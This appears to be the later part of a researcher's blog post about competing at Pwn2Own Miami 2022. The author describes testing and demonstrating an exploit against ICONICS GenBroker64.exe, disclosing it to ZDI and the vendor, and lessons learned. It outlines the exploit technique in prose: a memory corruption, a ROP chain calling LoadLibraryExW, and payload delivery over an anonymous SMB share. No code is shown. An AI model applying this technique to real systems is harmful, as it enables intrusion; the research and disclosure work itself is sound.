I'm not sure exactly when this happened, but COVID-19 pushed the competition back to the 19th / 21st of April 2022. This was a bummer as I worked hard to be on time 😩. I was disappointed, but it wasn't the worst thing to happen. I could relax a bit more and hope this extra time wouldn't allow the vendor to find and fix the vulnerability I planned to exploit. This part was a bit nerve-wracking as I didn't know any of the vendors; so I wasn't sure if this was something likely to happen or not.

Testing the exploit wasn't the most fun activity, but I was determined to do all the due diligence from my side as I wanted to maximize my chances to win. I knew the target software would run in a VMware virtual machine, so I downloaded it, and set one up. It felt silly as I had done my tests in a Hyper-V VM, and I didn't expect that a different hypervisor would change anything. Whatever. I get amazed every day at how complex and tricky to predict computers are, so I knew it might be useful.

The VM was ready, I threw the exploit at it, excited as always, and... nothing. That was unexpected, but it wasn't 100% reliable either, so I ran it more times. But nothing. Wow, what the heck 😬? It felt pretty uncomfortable, and my brain started to run far with impostor syndrome. I asked myself "Did you actually find a real vulnerability?" or "Had you set up the target with a non-default configuration?". Looking back on it, it is pretty funny, but oh boy, I wasn't laughing at the time.

I installed my debugging tools inside the target and threw the exploit on the operating table. I verified that I was triggering the memory corruption, and that my ROP chain was actually getting executed. What a relief. Maybe I do understand computers a little bit, I thought 😳.

Stepping through the ROP chain, it was clear that LoadLibraryExW was getting executed, and that it was reaching out to my SMB server. It didn't seem to ask to be served with the DLL I wanted it to load though. Googling the error code around, I realized something that I didn't know, and that could be a deal breaker. Windows 10, by default, prevents the default SMB client library from connecting anonymously to SMB shares 😮 Basically, the vector that I was using to deliver the final payload was blocked on the latest version of Windows. Wow, I didn't see this coming, and I felt pretty grateful to have set up a new environment and run into this case.

What was stressing me out, though, was that I needed to find another way to deliver the payload. I didn't see other quick ways to do that because of ASLR, and the imports of GenBroker64.exe. I had potential ideas, but they would have required me to be able to store a much larger ROP chain. But I didn't have that space. What was bizarre, though, was the fact that my other VM was also Windows 10, and it was working fine. It could have been possible that it wasn't quite the latest Windows 10 or that somehow I had turned it back on while installing some tool 🤔.

I eventually landed on this page, I believe: Guest access in SMB2 and SMB3 disabled by default in Windows. According to it, Windows 10 Enterprise edition turns it off by default, but Windows 10 Pro edition doesn't. So supposedly everything would be back working if I installed a Windows 10 Pro edition..? I reimaged my VM with a Professional version, and this time, the exploit worked as expected; phew 😅 I dodged a bullet on this one. I really didn't want to throw away all the work I had done with the ROP chain, and I wasn't motivated to find, and assemble new puzzle pieces.

I was finally.... ready. I was extremely nervous but also super excited. I worked hard on that project; it was time to collect some dividends and have fun.



I didn't want to burn too many vacation days, so I caught a red-eye flight from Seattle to Miami International Airport on the first day of the competition.



I landed at 7AM ish, grabbed a taxi from the airport and headed to my hotel in Miami Beach, close to The Fillmore Miami Beach (the venue).

I watched the draw online and was scheduled to go on the first day of the contest, on April 19th, at 2 p.m. local time. I worked the morning and took my afternoon off to attend the competition.

I showed up at the conference venue but didn't see any Pwn2Own posters or anything. Security guards were checking the attendees' badges, so I couldn't get in. I looked around the building for another entrance and checked my phone to see if I had missed something, but nothing. I returned to the main entrance to ask the security guards if they knew where Pwn2Own was happening. This was hilarious because they had no clue what this was. I asked "Do you know where the Pwn2Own competition is happening?", the guy answered "Hmm no I never heard about this. Let me ask my colleague" and started talking to his buddy through the earpiece. "Yo mitch, do you know anything about a ... own to pown, or an own to own competition..?". Boy, I was standing there, laughing hard inside 😂. After a few exchanges, they decided to grab somebody from the organization, and that person let me in and made me a badge: Pown 2Own. Epic 👌🏽

I entered the competition area, a medium-sized room with a few tables, the stage, and people hanging out. It was reasonably dark, and the light gave it a nice hacker ambiance. I hung out in the room, observing what people were up to. Journalists coming in and out, competitors discussing the schedule, etc.



The clock was ticking, and my turn was coming up pretty fast. I was worried that I wouldn't have time to set up and verify the configuration of the official target. I tried to make my presence known to the organizers, but I don't think they noticed. About 15 minutes before my turn, one of the organizers found me, and we went on the stage to set things up. I pulled out my laptop, plugged in an ethernet cable that connected me to the target laptop, and configured a static IP. I chose the same IP I used during my testing to ensure I didn't have a longer IP address, which would require a longer string and potentially run out of space in my ROP chain 🫢. I tried pinging the target IP, but it wasn't answering. I began to check if my firewall was on or if I had mistyped something but nothing worked. At this point, we decided to switch the ethernet cable as it was probably the problem. The clock was ticking, and we were about 5 minutes from show time but nothing was working yet.

I was getting nervous as I wanted to verify a few things on the target laptop to ensure it was properly configured. I ran through my checklist while somebody was looking for a new Ethernet cable. I checked the remote software version, the target IP, and that GenBroker64.exe was an x64 binary. One of the organizers handed me a cable, so I hooked it up. The Pwn2Own host started to go live and I could hear him introducing my entry. After a few seconds, he came over and asked if we were ready.. to which I nervously answered yes when, in fact, I wasn't ready 🤣. I had two minutes left to verify connectivity with the target and make sure the target could browse an SMB share I had opened, to ensure my payload would be delivered just fine. The target could browse my share, and I was finally able to ping the target, just in time to go live.

I felt stressed out and had a hard time typing the command line to invoke my exploit. I was worried I would mistype the IP address or something silly like that. I pressed enter to launch it... and immediately saw the calculator pop and the desktop wallpaper change. I was stunned 😱. I just could not believe that it landed. To this day, I am still shocked that it worked out; I am not even sure I cracked a smile 😅. People clapped, I closed my laptop and stood up, feeling the adrenaline rush through my legs. Powerful.

I followed one of the event organizers to the disclosure room, where ZDI verified that the vulnerability wasn't known to them. They looked on their laptop for a minute or two and said that they didn't know about it. Awesome. The second stage happens with the vendor. An employee of ICONICS entered the room, and I described the vulnerability and the exploit to them at a high level. They also said they didn't know about this bug, so I had officially won 🔥🙏.

I shook hands with the organizers and returned to my hotel with a big ass smile on my face. I actually couldn't stop smiling like a dummy. I dropped my laptop there and decided to take the next day off to reward myself. I returned to the venue and hung out in the room to watch the other entries for the day. This is where I eventually ran into Steven Seeley and Chris Anastasio. Those guys were planning to demonstrate 5 different exploits, which seemed insane to me 😳. It put things into perspective and made me feel like I had a lot to learn, which was exciting. On top of killing it at the competition, they were also extremely friendly and let me know that they were setting up a dinner with other participants. I was definitely game to join them and meet up with folks.

We gathered at a restaurant in Miami Beach, where I met the Flashback team (Pedro & Radek), Sharon & Uri from the Claroty Research team, and Daan & Thijs from Computest Sector7. Honestly, it felt amazing to meet fellow researchers and learn from them. It was super interesting to hear about people's backgrounds, how they approached the competition, and how they looked for bugs.

I spent the next two days hanging out, cheering for the competitors in the Pwn2Own room, grabbing celebratory drinks, and having a good time. Oh and of course, I grabbed oversized Pwn2Own Miami swag shirts 😅. Steven & Chris owned so many targets with a first-blood that they won many laptops. Out of kindness, they offered me one as a present, which I was super grateful for and which has been a great memento for me; so a big thank you to them.

I packed my bag, grabbed a taxi, headed to the airport, and flew back home with lifelong memories 🙏

✅ Wrapping up

In this post, I tried to walk you through the ups and downs of vulnerability research 🎢. I want to thank the ZDI folks for both organizing such a fun competition and rooting for participants 🙏. Also, special thanks to all the contestants for being inspiring and for their kindness 🙏.

I learned some good lessons along the way that might be useful for some of you out there:

- Don't underestimate what tooling can do when aimed at the right things. I initially didn't want to use fuzzing as I was interested in code review only. In the end, my quick fuzzing campaign highlighted something that I had missed, and that area ended up being juicy.

- Focus on understanding the target. In the end, it facilitates both bug finding and exploitation.

- Try to focus on solving problems one by one. Trying to visualize all the steps you have to go through to make something work can feel overwhelming. For me, it usually leads to analysis paralysis, which completely halts progress.

- Attack surface enumeration isn't super fun to me, yet I always regret not spending enough time on it.

- Testing isn't fun but it is worth being thorough when the stakes are high. It would have been heartbreaking for my entry to fail for an issue that I could have caught by doing proper testing.

If you want to take a look, the code of my exploit is available on GitHub: Paracosme. If you are interested in reading other write-ups from Pwn2Own Miami 2022, here is a list:

- Pwn2Own Miami 2022: Unified Automation C++ Demo Server DoS

- Pwn2Own Miami 2022: OPC UA .NET Standard Trusted Application Check Bypass

- Pwn2Own Miami 2022: Inductive Automation Ignition Remote Code Execution

- Pwn2Own Miami 2022: AVEVA Edge Arbitrary Code Execution

- Pwn2Own Miami 2022: ICONICS GENESIS64 Arbitrary Code Execution

- Two lines of Jscript for $20,000

Special thank you to my boiz yrp604 and __x86 for proofreading this article 🙏.

Last but not least, come hang out on Diary of reverse-engineering's Discord server with us 👌🏽!